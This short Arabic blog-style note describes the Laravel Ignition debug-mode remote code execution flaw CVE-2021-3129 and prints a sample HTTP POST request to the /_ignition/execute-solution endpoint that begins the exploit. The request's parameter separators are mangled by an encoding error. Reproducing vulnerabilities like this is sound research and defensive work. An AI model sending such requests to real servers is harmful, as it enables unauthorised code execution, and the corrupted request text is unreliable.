
Laravel RCE CVE-2021-3129
Laravel RCE CVE-2021-3129
عندما يتم تمكين وضع التصحيح (Debug) في Laravel، نظرًا للاستخدام غير الآمن للدوال file_get_contents() و file_put_contents() من قبل مكون Ignition المدمج في Laravel، يمكن للمهاجم إرسال طلبات ضارة، وإنشاء ملفات Log خبيثة بطرق تؤدي إلى تشغيل إلغاء التسلسل لـ Phar، مما يؤدي في النهاية إلى تنفيذ تعليمات برمجية عن بعد.
Laravel <= 8.4.2
POST /_ignition/execute-solution HTTP/1.1
Host: 192.168.24.153:8888
Accept: application/json
Content-Type: application/x-www-form-urlencoded
Content-Length: 133
solution=Facade\Ignition\Solutions\MakeViewVariableOptionalSolution¶meters[variableName]=cve20213129¶meters[viewFile]=null

[CVE-2021-3129]Laravel Debug mode RCE إعادة إنتاج | tyskillのBlog